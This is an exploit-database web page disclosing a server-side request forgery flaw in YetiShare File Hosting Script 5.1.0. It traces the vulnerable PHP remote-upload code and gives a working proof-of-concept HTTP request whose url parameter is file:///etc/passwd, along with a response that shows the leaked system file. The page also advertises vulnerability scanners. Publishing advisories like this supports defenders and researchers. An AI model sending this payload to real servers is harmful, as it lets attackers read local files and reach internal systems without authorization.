yetishare file hosting script 5.1.0 url serverside request forgery

▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability

Online Vulnerability Scanner Tools

Code...

				
# Title: YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery
# Date: 09.01.2021
# Author: Numan Türle
# Vendor Homepage: https://mfscripts.com
# Software Link: https://yetishare.com
# Version: v5.1.0
# Tested on: YetiShare - File Hosting Script v5.1.0, Php Version : 7.4


Summary
---------
YetiShare is script the file hosting. This script has remote file upload feature.
Since sufficient security measures are not taken in the remote file upload area, 
SSRF vulnerability available.

Description
---------
When a new upload request is received by the user, the following function block 
is called first.
app/tasks/process_remote_file_downloads.cron.php
------------------------------------------------
        // include plugin code
        $url = $urlDownloadData['url'];
        $params = PluginHelper::includeAppends('url_upload_handler', array(
            'url' => $url,
            'rowId' => 0,
            'urlDownloadData' => $urlDownloadData,
            )
        );
        $url = $params['url'];

        // start download
        $upload_handler->handleRemoteUrlUpload($url);
------------------------------------------------

The url parameter received as input from the user in the called function blog is 
sent to the "handleRemoteUrlUpload" function. 

/Users/numan/Desktop/file-hosting-script-v5.0.0-beta/app/services/
Uploader.class.php
------------------------------------------------------------------
public function handleRemoteUrlUpload($url, $rowId = 0) {
        .....
        $remoteFileDetails = $this->getRemoteFileDetails($url);
        $remoteFilesize = (int) $remoteFileDetails['bytes'];
        if ($remoteFilesize > $this->options['max_file_size']) {
            .....ERROR MSG
        }
        else {
            // look for real filename if passed in headers
            if (strlen($remoteFileDetails['real_filename'])) {
                $realFilename = trim(current(explode(';', 
                $remoteFileDetails['real_filename'])));
                if (strlen($realFilename)) {
                    $this->fileUpload->name = $realFilename;
                }
            }

            // try to get the file locally
            $localFile = $this->downloadRemoteFile($url, true);
------------------------------------------------------------------

In this function that is called, the details of the file are taken first and if 
the bytes is not larger than the max_file_size, the "downloadRemoteFile" 
function will go to the download.

------------------------------------------------------------------
public function getRemoteFileDetails($url) {
      .....
            $execute = curl_exec($ch);

            // check if any error occured
            if (!curl_errno($ch)) {
                $rs['bytes'] = (int) curl_getinfo($ch, 
                CURLINFO_CONTENT_LENGTH_DOWNLOAD);
.....
------------------------------------------------------------------
------------------------------------------------------------------
public function downloadRemoteFile($url, $streamResponse = false) {
        .....
        // use curl
        if (function_exists('curl_init')) {
            // get file via curl
            $fp = fopen($tmpFullPath, 'w+');
            if ($ch === null) {
                $ch = curl_init();
            }

            curl_setopt($ch, CURLOPT_URL, $url);
            .....
            curl_setopt($ch, CURLOPT_FILE, $fp);
            if (curl_exec($ch) === false) {
                // log error
                LogHelper::error('Failed getting url. Error: ' 
                . curl_error($ch) . ' (' . $url . ')');
                return false;
            }
            $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            fclose($fp);
            .....
        }
.....
------------------------------------------------------------------




POC
---------

GET /ajax/url_upload_handler?csaKey1=CSAKEY1&csaKey2=CSAKEY2&rowId=0&url=file:///etc/passwd&folderId=-1 HTTP/1.1
Host: target.com
Connection: close
Accept: */*
Cookie: HERE_COOKIE



Response
---------
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: close
Pragma: no-cache
Content-Length: XXX

...<script>parent.updateUrlProgress({"done":{"name":"passwd","size":2082,
"type":"text\/plain; charset=us-ascii","error":null,"rowId":0,
"requestUrl":"file:\/\/\/etc\/passwd","url":....



..........
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

Yetishare file hosting script 5.1.0 url serverside request forgery Vulnerability / Exploit Source : Yetishare file hosting script 5.1.0 url serverside request forgery

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.